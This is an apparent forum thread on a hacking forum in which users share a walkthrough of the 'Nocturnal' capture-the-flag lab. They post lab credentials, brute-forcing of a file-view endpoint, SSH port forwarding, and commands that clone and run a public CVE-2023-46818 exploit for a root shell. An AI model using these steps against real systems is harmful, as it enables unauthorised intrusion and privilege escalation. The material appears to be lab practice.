Posts: 33
Threads: 1
Joined: Oct 2024
Apr 12, 2025, 09:16 PM
(This post was last modified: Apr 12, 2025, 09:18 PM by samuelballsiu1.)
(Apr 12, 2025, 07:35 PM)kkkgrukckhko Wrote: We can use this syntax to check our uploads:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
but it doesn't make my revshell work, idk why, any suggestions?
(Apr 12, 2025, 08:10 PM)maggi Wrote: log into site as Amanda
Download backup
Dump the DB
ssh as that user
check local ports for interesting things
(Apr 12, 2025, 08:53 PM)hujson Wrote: how to download the sql dump? I'm getting a 403.
(Apr 12, 2025, 08:59 PM)samuelballsiu1 Wrote: Login as amanda:arHkG7HAI68X8s1J
Create backup with the password arHkG7HAI68X8s1J
and unzip with the same password arHkG7HAI68X8s1J
(Apr 12, 2025, 09:12 PM)hujson Wrote: Thanks, it worked. But how did you find the creds for that account?
Find the privacy.odt file in amanda's files by bruteforcing the username at the /view.php endpoint. After you've done that you can unzip the .odt file and grep for "pass" to find the password for that account.
Posts: 2
Threads: 0
Joined: Jan 2025
After downloading privacy.odt, unzip it; it contains a file with the passwd for amanda.
Posts: 2
Threads: 0
Joined: Feb 2025
Lost on root.
Found a service running on the box.
Also found a possible exploit, but it needs valid creds,
and I cannot find the creds.
Posts: 6
Threads: 0
Joined: Jan 2025
(Apr 12, 2025, 10:02 PM)alwaysphenom2 Wrote: Lost on root.
Found a service running on the box.
Also found a possible exploit, but it needs valid creds,
and I cannot find the creds.
the creds are default admin username "admin" and reused pass of tobias
Posts: 13
Threads: 0
Joined: Jan 2024
Easy root:
That's it! Pwned. Enjoy
Posts: 12
Threads: 1
Joined: Mar 2025
I have the same problem, did you solve it?
(Apr 12, 2025, 08:46 PM)samuelballsiu1 Wrote: Anyone knows what to do, to get root, after logged in through ssh as tobias?
Posts: 1
Threads: 0
Joined: Apr 2025
I don't know if you could share a step-by-step guide on how you obtained the flags.
Posts: 9
Threads: 3
Joined: Feb 2025
here mate:
nocturnal.htb/view.php?username=amanda&file=privacy.odt
there u can see this message:
Dear Amanda,
Nocturnal has set the following temporary password for you: arHkG7HAI68X8s1J. This password has been set for all our services, so it is essential that you change it on your first login to ensure the security of your account and our infrastructure.
The file has been created and provided by Nocturnal's IT team. If you have any questions or need additional assistance during the password change process, please do not hesitate to contact us.
Remember that maintaining the security of your credentials is paramount to protecting your information and that of the company. We appreciate your prompt attention to this matter.
Yours sincerely,
Nocturnal's IT team
Posts: 216
Threads: 42
Joined: Nov 2024
I have shared quick user and root, not for free this time as I need some credits.
If you don't have credits, DM and I will share.
https://breachforums.rs/Thread-Nocturnal...r-and-root
Posts: 1
Threads: 0
Joined: Apr 2025
(Apr 12, 2025, 11:25 PM)machakilos Wrote: here so u dont have to pay : Tobias Credentials (needed for further steps):
tobias lowmotionapocalypse
1. Do port forwarding of the 8080 port of the machine to your local machine with SSH:
ssh -L 9999:127.0.0.1:8080 tobias@nocturnal.htb
2. Read user flag:
cat usert.txt
3. On your local machine clone the following repo and exploit the vulnerability:
$ git clone https://github.com/bipbopbup/CVE-2023-46...xploit.git
$ cd CVE-2023-46818-python-exploit
$ python3 exploit.py http://127.0.0.1:9999/ admin slowmotionapocalypse
4. The exploit will provide you with a root shell into the machine, then you can read the root.txt flag:
cat /root/root.txt
yo machakilos, could you explain why 127.0.0.1 is used instead of the ip addr of the box?